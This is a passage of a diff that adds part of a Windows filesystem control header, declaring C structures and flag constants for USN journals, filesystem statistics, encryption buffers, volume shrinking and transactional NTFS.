LARGE_INTEGER SourceFileRecord; + LARGE_INTEGER TargetFileRecord; + +} MOVE_FILE_RECORD_DATA, *PMOVE_FILE_RECORD_DATA; + + +#if defined(_WIN64) + +typedef struct _MOVE_FILE_DATA32 { + + UINT32 FileHandle; + LARGE_INTEGER StartingVcn; + LARGE_INTEGER StartingLcn; + ULONG ClusterCount; + +} MOVE_FILE_DATA32, *PMOVE_FILE_DATA32; +#endif +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct { + ULONG Restart; + SID Sid; +} FIND_BY_SID_DATA, *PFIND_BY_SID_DATA; + +typedef struct { + ULONG NextEntryOffset; + ULONG FileIndex; + ULONG FileNameLength; + WCHAR FileName[1]; +} FIND_BY_SID_OUTPUT, *PFIND_BY_SID_OUTPUT; + +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct { + + ULONGLONG StartFileReferenceNumber; + USN LowUsn; + USN HighUsn; + +} MFT_ENUM_DATA, *PMFT_ENUM_DATA; + +typedef struct { + + ULONGLONG MaximumSize; + ULONGLONG AllocationDelta; + +} CREATE_USN_JOURNAL_DATA, *PCREATE_USN_JOURNAL_DATA; + +typedef struct { + + USN StartUsn; + ULONG ReasonMask; + ULONG ReturnOnlyOnClose; + ULONGLONG Timeout; + ULONGLONG BytesToWaitFor; + ULONGLONG UsnJournalID; + +} READ_USN_JOURNAL_DATA, *PREAD_USN_JOURNAL_DATA; + +typedef struct { + + ULONG RecordLength; + USHORT MajorVersion; + USHORT MinorVersion; + ULONGLONG FileReferenceNumber; + ULONGLONG ParentFileReferenceNumber; + USN Usn; + LARGE_INTEGER TimeStamp; + ULONG Reason; + ULONG SourceInfo; + ULONG SecurityId; + ULONG FileAttributes; + USHORT FileNameLength; + USHORT FileNameOffset; + WCHAR FileName[1]; + +} USN_RECORD, *PUSN_RECORD; + +#define USN_PAGE_SIZE (0x1000) + +#define USN_REASON_DATA_OVERWRITE (0x00000001) +#define USN_REASON_DATA_EXTEND (0x00000002) +#define USN_REASON_DATA_TRUNCATION (0x00000004) +#define USN_REASON_NAMED_DATA_OVERWRITE (0x00000010) +#define USN_REASON_NAMED_DATA_EXTEND (0x00000020) +#define USN_REASON_NAMED_DATA_TRUNCATION (0x00000040) +#define USN_REASON_FILE_CREATE (0x00000100) +#define USN_REASON_FILE_DELETE (0x00000200) +#define USN_REASON_EA_CHANGE (0x00000400) +#define USN_REASON_SECURITY_CHANGE (0x00000800) +#define USN_REASON_RENAME_OLD_NAME (0x00001000) +#define USN_REASON_RENAME_NEW_NAME (0x00002000) +#define USN_REASON_INDEXABLE_CHANGE (0x00004000) +#define USN_REASON_BASIC_INFO_CHANGE (0x00008000) +#define USN_REASON_HARD_LINK_CHANGE (0x00010000) +#define USN_REASON_COMPRESSION_CHANGE (0x00020000) +#define USN_REASON_ENCRYPTION_CHANGE (0x00040000) +#define USN_REASON_OBJECT_ID_CHANGE (0x00080000) +#define USN_REASON_REPARSE_POINT_CHANGE (0x00100000) +#define USN_REASON_STREAM_CHANGE (0x00200000) +#define USN_REASON_TRANSACTED_CHANGE (0x00400000) +#define USN_REASON_CLOSE (0x80000000) + +typedef struct { + + ULONGLONG UsnJournalID; + USN FirstUsn; + USN NextUsn; + USN LowestValidUsn; + USN MaxUsn; + ULONGLONG MaximumSize; + ULONGLONG AllocationDelta; + +} USN_JOURNAL_DATA, *PUSN_JOURNAL_DATA; + +typedef struct { + + ULONGLONG UsnJournalID; + ULONG DeleteFlags; + +} DELETE_USN_JOURNAL_DATA, *PDELETE_USN_JOURNAL_DATA; + +#define USN_DELETE_FLAG_DELETE (0x00000001) +#define USN_DELETE_FLAG_NOTIFY (0x00000002) + +#define USN_DELETE_VALID_FLAGS (0x00000003) + +typedef struct { + + ULONG UsnSourceInfo; + HANDLE VolumeHandle; + ULONG HandleInfo; + +} MARK_HANDLE_INFO, *PMARK_HANDLE_INFO; + +#if defined(_WIN64) + +typedef struct { + + ULONG UsnSourceInfo; + UINT32 VolumeHandle; + ULONG HandleInfo; + +} MARK_HANDLE_INFO32, *PMARK_HANDLE_INFO32; +#endif + +#define USN_SOURCE_DATA_MANAGEMENT (0x00000001) +#define USN_SOURCE_AUXILIARY_DATA (0x00000002) +#define USN_SOURCE_REPLICATION_MANAGEMENT (0x00000004) + +#define MARK_HANDLE_PROTECT_CLUSTERS (0x00000001) +#define MARK_HANDLE_TXF_SYSTEM_LOG (0x00000004) +#define MARK_HANDLE_NOT_TXF_SYSTEM_LOG (0x00000008) + +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0601) + +#define MARK_HANDLE_REALTIME (0x00000020) +#define MARK_HANDLE_NOT_REALTIME (0x00000040) + +#define NO_8DOT3_NAME_PRESENT (0x00000001) +#define REMOVED_8DOT3_NAME (0x00000002) + +#define PERSISTENT_VOLUME_STATE_SHORT_NAME_CREATION_DISABLED (0x00000001) + +#endif /* _WIN32_WINNT >= 0x0601 */ + + +#if (_WIN32_WINNT >= 0x0500) +typedef struct { + + ACCESS_MASK DesiredAccess; + ULONG SecurityIds[1]; + +} BULK_SECURITY_TEST_DATA, *PBULK_SECURITY_TEST_DATA; +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0500) + +#define VOLUME_IS_DIRTY (0x00000001) +#define VOLUME_UPGRADE_SCHEDULED (0x00000002) +#define VOLUME_SESSION_OPEN (0x00000004) +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _FILE_PREFETCH { + ULONG Type; + ULONG Count; + ULONGLONG Prefetch[1]; +} FILE_PREFETCH, *PFILE_PREFETCH; + +typedef struct _FILE_PREFETCH_EX { + ULONG Type; + ULONG Count; + PVOID Context; + ULONGLONG Prefetch[1]; +} FILE_PREFETCH_EX, *PFILE_PREFETCH_EX; + +#define FILE_PREFETCH_TYPE_FOR_CREATE 0x1 +#define FILE_PREFETCH_TYPE_FOR_DIRENUM 0x2 +#define FILE_PREFETCH_TYPE_FOR_CREATE_EX 0x3 +#define FILE_PREFETCH_TYPE_FOR_DIRENUM_EX 0x4 + +#define FILE_PREFETCH_TYPE_MAX 0x4 + +#endif /* _WIN32_WINNT >= 0x0500 */ + +typedef struct _FILESYSTEM_STATISTICS { + + USHORT FileSystemType; + USHORT Version; // currently version 1 + + ULONG SizeOfCompleteStructure; // must by a mutiple of 64 bytes + + ULONG UserFileReads; + ULONG UserFileReadBytes; + ULONG UserDiskReads; + ULONG UserFileWrites; + ULONG UserFileWriteBytes; + ULONG UserDiskWrites; + + ULONG MetaDataReads; + ULONG MetaDataReadBytes; + ULONG MetaDataDiskReads; + ULONG MetaDataWrites; + ULONG MetaDataWriteBytes; + ULONG MetaDataDiskWrites; +} FILESYSTEM_STATISTICS, *PFILESYSTEM_STATISTICS; + +// values for FS_STATISTICS.FileSystemType + +#define FILESYSTEM_STATISTICS_TYPE_NTFS 1 +#define FILESYSTEM_STATISTICS_TYPE_FAT 2 +#define FILESYSTEM_STATISTICS_TYPE_EXFAT 3 +typedef struct _FAT_STATISTICS { + ULONG CreateHits; + ULONG SuccessfulCreates; + ULONG FailedCreates; + + ULONG NonCachedReads; + ULONG NonCachedReadBytes; + ULONG NonCachedWrites; + ULONG NonCachedWriteBytes; + + ULONG NonCachedDiskReads; + ULONG NonCachedDiskWrites; +} FAT_STATISTICS, *PFAT_STATISTICS; + +typedef struct _EXFAT_STATISTICS { + ULONG CreateHits; + ULONG SuccessfulCreates; + ULONG FailedCreates; + + ULONG NonCachedReads; + ULONG NonCachedReadBytes; + ULONG NonCachedWrites; + ULONG NonCachedWriteBytes; + + ULONG NonCachedDiskReads; + ULONG NonCachedDiskWrites; +} EXFAT_STATISTICS, *PEXFAT_STATISTICS; + +typedef struct _NTFS_STATISTICS { + + ULONG LogFileFullExceptions; + ULONG OtherExceptions; + + ULONG MftReads; + ULONG MftReadBytes; + ULONG MftWrites; + ULONG MftWriteBytes; + struct { + USHORT Write; + USHORT Create; + USHORT SetInfo; + USHORT Flush; + } MftWritesUserLevel; + + USHORT MftWritesFlushForLogFileFull; + USHORT MftWritesLazyWriter; + USHORT MftWritesUserRequest; + + ULONG Mft2Writes; + ULONG Mft2WriteBytes; + struct { + USHORT Write; + USHORT Create; + USHORT SetInfo; + USHORT Flush; + } Mft2WritesUserLevel; + + USHORT Mft2WritesFlushForLogFileFull; + USHORT Mft2WritesLazyWriter; + USHORT Mft2WritesUserRequest; + + ULONG RootIndexReads; + ULONG RootIndexReadBytes; + ULONG RootIndexWrites; + ULONG RootIndexWriteBytes; + + ULONG BitmapReads; + ULONG BitmapReadBytes; + ULONG BitmapWrites; + ULONG BitmapWriteBytes; + + USHORT BitmapWritesFlushForLogFileFull; + USHORT BitmapWritesLazyWriter; + USHORT BitmapWritesUserRequest; + + struct { + USHORT Write; + USHORT Create; + USHORT SetInfo; + } BitmapWritesUserLevel; + + ULONG MftBitmapReads; + ULONG MftBitmapReadBytes; + ULONG MftBitmapWrites; + ULONG MftBitmapWriteBytes; + + USHORT MftBitmapWritesFlushForLogFileFull; + USHORT MftBitmapWritesLazyWriter; + USHORT MftBitmapWritesUserRequest; + + struct { + USHORT Write; + USHORT Create; + USHORT SetInfo; + USHORT Flush; + } MftBitmapWritesUserLevel; + + ULONG UserIndexReads; + ULONG UserIndexReadBytes; + ULONG UserIndexWrites; + ULONG UserIndexWriteBytes; + ULONG LogFileReads; + ULONG LogFileReadBytes; + ULONG LogFileWrites; + ULONG LogFileWriteBytes; + + struct { + ULONG Calls; // number of individual calls to allocate clusters + ULONG Clusters; // number of clusters allocated + ULONG Hints; // number of times a hint was specified + + ULONG RunsReturned; // number of runs used to satisify all the requests + + ULONG HintsHonored; // number of times the hint was useful + ULONG HintsClusters; // number of clusters allocated via the hint + ULONG Cache; // number of times the cache was useful other than the hint + ULONG CacheClusters; // number of clusters allocated via the cache other than the hint + ULONG CacheMiss; // number of times the cache wasn't useful + ULONG CacheMissClusters; // number of clusters allocated without the cache + } Allocate; + +} NTFS_STATISTICS, *PNTFS_STATISTICS; + +#if (_WIN32_WINNT >= 0x0500) + +#if _MSC_VER >= 1200 +#pragma warning(push) +#endif +#pragma warning(disable:4201) // unnamed struct + +typedef struct _FILE_OBJECTID_BUFFER { + + UCHAR ObjectId[16]; + + union { + struct { + UCHAR BirthVolumeId[16]; + UCHAR BirthObjectId[16]; + UCHAR DomainId[16]; + } DUMMYSTRUCTNAME; + UCHAR ExtendedInfo[48]; + } DUMMYUNIONNAME; + +} FILE_OBJECTID_BUFFER, *PFILE_OBJECTID_BUFFER; + +#if _MSC_VER >= 1200 +#pragma warning(pop) +#else +#pragma warning( default : 4201 ) /* nonstandard extension used : nameless struct/union */ +#endif + +#endif /* _WIN32_WINNT >= 0x0500 */ + + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _FILE_SET_SPARSE_BUFFER { + BOOLEAN SetSparse; +} FILE_SET_SPARSE_BUFFER, *PFILE_SET_SPARSE_BUFFER; + + +#endif /* _WIN32_WINNT >= 0x0500 */ + + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _FILE_ZERO_DATA_INFORMATION { + + LARGE_INTEGER FileOffset; + LARGE_INTEGER BeyondFinalZero; + +} FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFORMATION; +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _FILE_ALLOCATED_RANGE_BUFFER { + + LARGE_INTEGER FileOffset; + LARGE_INTEGER Length; + +} FILE_ALLOCATED_RANGE_BUFFER, *PFILE_ALLOCATED_RANGE_BUFFER; +#endif /* _WIN32_WINNT >= 0x0500 */ + + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _ENCRYPTION_BUFFER { + + ULONG EncryptionOperation; + UCHAR Private[1]; + +} ENCRYPTION_BUFFER, *PENCRYPTION_BUFFER; + +#define FILE_SET_ENCRYPTION 0x00000001 +#define FILE_CLEAR_ENCRYPTION 0x00000002 +#define STREAM_SET_ENCRYPTION 0x00000003 +#define STREAM_CLEAR_ENCRYPTION 0x00000004 + +#define MAXIMUM_ENCRYPTION_VALUE 0x00000004 + +typedef struct _DECRYPTION_STATUS_BUFFER { + + BOOLEAN NoEncryptedStreams; + +} DECRYPTION_STATUS_BUFFER, *PDECRYPTION_STATUS_BUFFER; + +#define ENCRYPTION_FORMAT_DEFAULT (0x01) + +#define COMPRESSION_FORMAT_SPARSE (0x4000) + +typedef struct _REQUEST_RAW_ENCRYPTED_DATA { + + LONGLONG FileOffset; + ULONG Length; + +} REQUEST_RAW_ENCRYPTED_DATA, *PREQUEST_RAW_ENCRYPTED_DATA; + +typedef struct _ENCRYPTED_DATA_INFO { + + ULONGLONG StartingFileOffset; + + ULONG OutputBufferOffset; + + ULONG BytesWithinFileSize; + + ULONG BytesWithinValidDataLength; + + USHORT CompressionFormat; + + UCHAR DataUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + + UCHAR EncryptionFormat; + + USHORT NumberOfDataBlocks; + + ULONG DataBlockSize[ANYSIZE_ARRAY]; + +} ENCRYPTED_DATA_INFO; +typedef ENCRYPTED_DATA_INFO *PENCRYPTED_DATA_INFO; +#endif /* _WIN32_WINNT >= 0x0500 */ + + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _PLEX_READ_DATA_REQUEST { + + LARGE_INTEGER ByteOffset; + ULONG ByteLength; + ULONG PlexNumber; + +} PLEX_READ_DATA_REQUEST, *PPLEX_READ_DATA_REQUEST; +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0500) + +typedef struct _SI_COPYFILE { + ULONG SourceFileNameLength; + ULONG DestinationFileNameLength; + ULONG Flags; + WCHAR FileNameBuffer[1]; +} SI_COPYFILE, *PSI_COPYFILE; + +#define COPYFILE_SIS_LINK 0x0001 // Copy only if source is SIS +#define COPYFILE_SIS_REPLACE 0x0002 // Replace destination if it exists, otherwise don't. +#define COPYFILE_SIS_FLAGS 0x0003 +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0600) + +typedef struct _FILE_MAKE_COMPATIBLE_BUFFER { + BOOLEAN CloseDisc; +} FILE_MAKE_COMPATIBLE_BUFFER, *PFILE_MAKE_COMPATIBLE_BUFFER; + + +typedef struct _FILE_SET_DEFECT_MGMT_BUFFER { + BOOLEAN Disable; +} FILE_SET_DEFECT_MGMT_BUFFER, *PFILE_SET_DEFECT_MGMT_BUFFER; + + +typedef struct _FILE_QUERY_SPARING_BUFFER { + ULONG SparingUnitBytes; + BOOLEAN SoftwareSparing; + ULONG TotalSpareBlocks; + ULONG FreeSpareBlocks; +} FILE_QUERY_SPARING_BUFFER, *PFILE_QUERY_SPARING_BUFFER; + + +typedef struct _FILE_QUERY_ON_DISK_VOL_INFO_BUFFER { + LARGE_INTEGER DirectoryCount; // -1 = unknown + LARGE_INTEGER FileCount; // -1 = unknown + USHORT FsFormatMajVersion; // -1 = unknown or n/a + USHORT FsFormatMinVersion; // -1 = unknown or n/a + WCHAR FsFormatName[ 12]; + LARGE_INTEGER FormatTime; + LARGE_INTEGER LastUpdateTime; + WCHAR CopyrightInfo[ 34]; + WCHAR AbstractInfo[ 34]; + WCHAR FormattingImplementationInfo[ 34]; + WCHAR LastModifyingImplementationInfo[ 34]; +} FILE_QUERY_ON_DISK_VOL_INFO_BUFFER, *PFILE_QUERY_ON_DISK_VOL_INFO_BUFFER; + + +#define SET_REPAIR_ENABLED (0x00000001) +#define SET_REPAIR_VOLUME_BITMAP_SCAN (0x00000002) +#define SET_REPAIR_DELETE_CROSSLINK (0x00000004) +#define SET_REPAIR_WARN_ABOUT_DATA_LOSS (0x00000008) +#define SET_REPAIR_DISABLED_AND_BUGCHECK_ON_CORRUPT (0x00000010) +#define SET_REPAIR_VALID_MASK (0x0000001F) + +typedef enum _SHRINK_VOLUME_REQUEST_TYPES +{ + ShrinkPrepare = 1, + ShrinkCommit, + ShrinkAbort + +} SHRINK_VOLUME_REQUEST_TYPES, *PSHRINK_VOLUME_REQUEST_TYPES; + +typedef struct _SHRINK_VOLUME_INFORMATION +{ + SHRINK_VOLUME_REQUEST_TYPES ShrinkRequestType; + ULONGLONG Flags; + LONGLONG NewNumberOfSectors; + +} SHRINK_VOLUME_INFORMATION, *PSHRINK_VOLUME_INFORMATION; + +#define TXFS_RM_FLAG_LOGGING_MODE 0x00000001 +#define TXFS_RM_FLAG_RENAME_RM 0x00000002 +#define TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MAX 0x00000004 +#define TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MIN 0x00000008 +#define TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_NUM_CONTAINERS 0x00000010 +#define TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_PERCENT 0x00000020 +#define TXFS_RM_FLAG_LOG_AUTO_SHRINK_PERCENTAGE 0x00000040 +#define TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MAX 0x00000080 +#define TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MIN 0x00000100 +#define TXFS_RM_FLAG_GROW_LOG 0x00000400 +#define TXFS_RM_FLAG_SHRINK_LOG 0x00000800 +#define TXFS_RM_FLAG_ENFORCE_MINIMUM_SIZE 0x00001000 +#define TXFS_RM_FLAG_PRESERVE_CHANGES 0x00002000 +#define TXFS_RM_FLAG_RESET_RM_AT_NEXT_START 0x00004000 +#define TXFS_RM_FLAG_DO_NOT_RESET_RM_AT_NEXT_START 0x00008000 +#define TXFS_RM_FLAG_PREFER_CONSISTENCY 0x00010000 +#define TXFS_RM_FLAG_PREFER_AVAILABILITY 0x00020000 + +#define TXFS_LOGGING_MODE_SIMPLE (0x0001) +#define TXFS_LOGGING_MODE_FULL (0x0002) + +#define TXFS_TRANSACTION_STATE_NONE 0x00 +#define TXFS_TRANSACTION_STATE_ACTIVE 0x01 +#define TXFS_TRANSACTION_STATE_PREPARED 0x02 +#define TXFS_TRANSACTION_STATE_NOTACTIVE 0x03 + +#define TXFS_MODIFY_RM_VALID_FLAGS \ + (TXFS_RM_FLAG_LOGGING_MODE | \ + TXFS_RM_FLAG_RENAME_RM | \ + TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MAX | \ + TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MIN | \ + TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_NUM_CONTAINERS | \ + TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_PERCENT | \ + TXFS_RM_FLAG_LOG_AUTO_SHRINK_PERCENTAGE | \ + TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MAX | \ + TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MIN | \ + TXFS_RM_FLAG_SHRINK_LOG | \ + TXFS_RM_FLAG_GROW_LOG | \ + TXFS_RM_FLAG_ENFORCE_MINIMUM_SIZE | \ + TXFS_RM_FLAG_PRESERVE_CHANGES | \ + TXFS_RM_FLAG_RESET_RM_AT_NEXT_START | \ + TXFS_RM_FLAG_DO_NOT_RESET_RM_AT_NEXT_START | \ + TXFS_RM_FLAG_PREFER_CONSISTENCY | \ + TXFS_RM_FLAG_PREFER_AVAILABILITY) + +typedef struct _TXFS_MODIFY_RM { + + // + // TXFS_RM_FLAG_* flags + // + + ULONG Flags; + + // + // Maximum log container count if TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MAX is set. + // + + ULONG LogContainerCountMax; + + // + // Minimum log container count if TXFS_RM_FLAG_LOG_CONTAINER_COUNT_MIN is set. + // + + ULONG LogContainerCountMin; + + // + // Target log container count for TXFS_RM_FLAG_SHRINK_LOG or _GROW_LOG. + // + + ULONG LogContainerCount; + + // + // When the log is full, increase its size by this much. Indicated as either a percent of + // the log size or absolute container count, depending on which of the TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_* + // flags is set. + // + + ULONG LogGrowthIncrement; + + // + // Sets autoshrink policy if TXFS_RM_FLAG_LOG_AUTO_SHRINK_PERCENTAGE is set. Autoshrink + // makes the log shrink so that no more than this percentage of the log is free at any time. + // + + ULONG LogAutoShrinkPercentage; + + // + // Reserved. + // + + ULONGLONG Reserved; + + // + // If TXFS_RM_FLAG_LOGGING_MODE is set, this must contain one of TXFS_LOGGING_MODE_SIMPLE + // or TXFS_LOGGING_MODE_FULL. + // + + USHORT LoggingMode; + +} TXFS_MODIFY_RM, + *PTXFS_MODIFY_RM; + +#define TXFS_RM_STATE_NOT_STARTED 0 +#define TXFS_RM_STATE_STARTING 1 +#define TXFS_RM_STATE_ACTIVE 2 +#define TXFS_RM_STATE_SHUTTING_DOWN 3 + +#define TXFS_QUERY_RM_INFORMATION_VALID_FLAGS \ + (TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_NUM_CONTAINERS | \ + TXFS_RM_FLAG_LOG_GROWTH_INCREMENT_PERCENT | \ + TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MAX | \ + TXFS_RM_FLAG_LOG_NO_CONTAINER_COUNT_MIN | \ + TXFS_RM_FLAG_RESET_RM_AT_NEXT_START | \ + TXFS_RM_FLAG_DO_NOT_RESET_RM_AT_NEXT_START | \ + TXFS_RM_FLAG_PREFER_CONSISTENCY | \ + TXFS_RM_FLAG_PREFER_AVAILABILITY) + +typedef struct _TXFS_QUERY_RM_INFORMATION { + + ULONG BytesRequired; + + ULONGLONG TailLsn; + ULONGLONG CurrentLsn; + ULONGLONG ArchiveTailLsn; + ULONGLONG LogContainerSize; + LARGE_INTEGER HighestVirtualClock; + ULONG LogContainerCount; + ULONG LogContainerCountMax; + ULONG LogContainerCountMin; + ULONG LogGrowthIncrement; + ULONG LogAutoShrinkPercentage; + ULONG Flags; + + // + // Exactly one of TXFS_LOGGING_MODE_SIMPLE or TXFS_LOGGING_MODE_FULL. + // + + USHORT LoggingMode; + + // + // Reserved. + // + + USHORT Reserved; + + // + // Activity state of the RM. May be exactly one of the above-defined TXF_RM_STATE_ values. + // + + ULONG RmState; + + // + // Total capacity of the log in bytes. + // + + ULONGLONG LogCapacity; + + // + // Amount of free space in the log in bytes. + // + + ULONGLONG LogFree; + + // + // Size of $Tops in bytes. + // + + ULONGLONG TopsSize; + + // + // Amount of space in $Tops in use. + // + + ULONGLONG TopsUsed; + + // + // Number of transactions active in the RM at the time of the call. + // + + ULONGLONG TransactionCount; + + // + // Total number of single-phase commits that have happened the RM. + // + + ULONGLONG OnePCCount; + + // + // Total number of two-phase commits that have happened the RM. + // + + ULONGLONG TwoPCCount; + + // + // Number of times the log has filled up. + // + + ULONGLONG NumberLogFileFull; + + // + // Age of oldest active transaction in the RM, in milliseconds. + // + + ULONGLONG OldestTransactionAge; + + GUID RMName; + + ULONG TmLogPathOffset; + +} TXFS_QUERY_RM_INFORMATION, + *PTXFS_QUERY_RM_INFORMATION; + +#define TXFS_ROLLFORWARD_REDO_FLAG_USE_LAST_REDO_LSN 0x01 +#define TXFS_ROLLFORWARD_REDO_FLAG_USE_LAST_VIRTUAL_CLOCK 0x02 + +#define TXFS_ROLLFORWARD_REDO_VALID_FLAGS \ + (TXFS_ROLLFORWARD_REDO_FLAG_USE_LAST_REDO_LSN | \ + TXFS_ROLLFORWARD_REDO_FLAG_USE_LAST_VIRTUAL_CLOCK) + +typedef struct _TXFS_ROLLFORWARD_REDO_INFORMATION { + LARGE_INTEGER LastVirtualClock; + ULONGLONG LastRedoLsn; + ULONGLONG HighestRecoveryLsn; + ULONG Flags; +} TXFS_ROLLFORWARD_REDO_INFORMATION, + *PTXFS_ROLLFORWARD_REDO_INFORMATION; + +#define TXFS_START_RM_FLAG_LOG_CONTAINER_COUNT_MAX 0x00000001 +#define TXFS_START_RM_FLAG_LOG_CONTAINER_COUNT_MIN 0x00000002 +#define TXFS_START_RM_FLAG_LOG_CONTAINER_SIZE 0x00000004 +#define TXFS_START_RM_FLAG_LOG_GROWTH_INCREMENT_NUM_CONTAINERS 0x00000008 +#define TXFS_START_RM_FLAG_LOG_GROWTH_INCREMENT_PERCENT 0x00000010 +#define TXFS_START_RM_FLAG_LOG_AUTO_SHRINK_PERCENTAGE 0x00000020 +#define TXFS_START_RM_FLAG_LOG_NO_CONTAINER_COUNT_MAX 0x00000040 +#define TXFS_START_RM_FLAG_LOG_NO_CONTAINER_COUNT_MIN 0x00000080 + +#define TXFS_START_RM_FLAG_RECOVER_BEST_EFFORT 0x00000200 +#define TXFS_START_RM_FLAG_LOGGING_MODE 0x00000400 +#define TXFS_START_RM_FLAG_PRESERVE_CHANGES 0x00000800 + +#define TXFS_START_RM_FLAG_PREFER_CONSISTENCY 0x00001000 +#define TXFS_START_RM_FLAG_PREFER_AVAILABILITY 0x00002000 + +#define TXFS_START_RM_VALID_FLAGS \ + (TXFS_START_RM_FLAG_LOG_CONTAINER_COUNT_MAX | \ + TXFS_START_RM_FLAG_LOG_CONTAINER_COUNT_MIN | \ + TXFS_START_RM_FLAG_LOG_CONTAINER_SIZE | \ + TXFS_START_RM_FLAG_LOG_GROWTH_INCREMENT_NUM_CONTAINERS | \ + TXFS_START_RM_FLAG_LOG_GROWTH_INCREMENT_PERCENT | \ + TXFS_START_RM_FLAG_LOG_AUTO_SHRINK_PERCENTAGE | \ + TXFS_START_RM_FLAG_RECOVER_BEST_EFFORT | \ + TXFS_START_RM_FLAG_LOG_NO_CONTAINER_COUNT_MAX | \ + TXFS_START_RM_FLAG_LOGGING_MODE | \ + TXFS_START_RM_FLAG_PRESERVE_CHANGES | \ + TXFS_START_RM_FLAG_PREFER_CONSISTENCY | \ + TXFS_START_RM_FLAG_PREFER_AVAILABILITY) + +typedef struct _TXFS_START_RM_INFORMATION { + + // + // TXFS_START_RM_FLAG_* flags. + // + + ULONG Flags; + + // + // RM log container size, in bytes. This parameter is optional. + // + + ULONGLONG LogContainerSize; + + // + // RM minimum log container count. This parameter is optional. + // + + ULONG LogContainerCountMin; + + // + // RM maximum log container count. This parameter is optional. + // + + ULONG LogContainerCountMax; + + // + // RM log growth increment in number of containers or percent, as indicated + // by TXFS_START_RM_FLAG_LOG_GROWTH_INCREMENT_* flag. This parameter is + // optional. + // + + ULONG LogGrowthIncrement; + + // + // RM log auto shrink percentage. This parameter is optional. + // + + ULONG LogAutoShrinkPercentage; + + // + // Offset from the beginning of this structure to the log path for the KTM + // instance to be used by this RM. This must be a two-byte (WCHAR) aligned + // value. This parameter is required. + // + + ULONG TmLogPathOffset; + + // + // Length in bytes of log path for the KTM instance to be used by this RM. + // This parameter is required. + // + + USHORT TmLogPathLength; + + // + // Logging mode for this RM. One of TXFS_LOGGING_MODE_SIMPLE or + // TXFS_LOGGING_MODE_FULL (mutually exclusive). This parameter is optional, + // and will default to TXFS_LOGGING_MODE_SIMPLE. + // + + USHORT LoggingMode; + + // + // Length in bytes of the path to the log to be used by the RM. This parameter + // is required. + // + + USHORT LogPathLength; + + // + // Reserved. + // + + USHORT Reserved; + + // + // The path to the log (in Unicode characters) to be used by the RM goes here. + // This parameter is required. + // + + WCHAR LogPath[1]; + +} TXFS_START_RM_INFORMATION, + *PTXFS_START_RM_INFORMATION; + +// +// Structures for FSCTL_TXFS_GET_METADATA_INFO +// + +typedef struct _TXFS_GET_METADATA_INFO_OUT { + + // + // Returns the TxfId of the file referenced by the handle used to call this routine. + // + + struct { + LONGLONG LowPart; + LONGLONG HighPart; + } TxfFileId; + + // + // The GUID of the transaction that has the file locked, if applicable. + // + + GUID LockingTransaction; + + // + // Returns the LSN for the most recent log record we've written for the file. + // + + ULONGLONG LastLsn; + + // + // Transaction state, a TXFS_TRANSACTION_STATE_* value. + // + + ULONG TransactionState; + +} TXFS_GET_METADATA_INFO_OUT, *PTXFS_GET_METADATA_INFO_OUT; + +#define TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY_FLAG_CREATED 0x00000001 +#define TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY_FLAG_DELETED 0x00000002 + +typedef struct _TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY { + + // + // Offset in bytes from the beginning of the TXFS_LIST_TRANSACTION_LOCKED_FILES + // structure to the next TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY. + // + + ULONGLONG Offset; + + // + // TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY_FLAG_* flags to indicate whether the + // current name was deleted or created in the transaction. + // + + ULONG NameFlags; + + // + // NTFS File ID of the file. + // + + LONGLONG FileId; + + // + // Reserved. + // + + ULONG Reserved1; + ULONG Reserved2; + LONGLONG Reserved3; + + // + // NULL-terminated Unicode path to this file, relative to RM root. + // + + WCHAR FileName[1]; +} TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY, *PTXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY; + + +typedef struct _TXFS_LIST_TRANSACTION_LOCKED_FILES { + + // + // GUID name of the KTM transaction that files should be enumerated from. + // + + GUID KtmTransaction; + + // + // On output, the number of files involved in the transaction on this RM. + // + + ULONGLONG NumberOfFiles; + + // + // The length of the buffer required to obtain the complete list of files. + // This value may change from call to call as the transaction locks more files. + // + + ULONGLONG BufferSizeRequired; + + // + // Offset in bytes from the beginning of this structure to the first + // TXFS_LIST_TRANSACTION_LOCKED_FILES_ENTRY. + // + + ULONGLONG Offset; +} TXFS_LIST_TRANSACTION_LOCKED_FILES, *PTXFS_LIST_TRANSACTION_LOCKED_FILES; + +// +// Structures for FSCTL_TXFS_LIST_TRANSACTIONS +// + +typedef struct _TXFS_LIST_TRANSACTIONS_ENTRY { + + // + // Transaction GUID. + // + 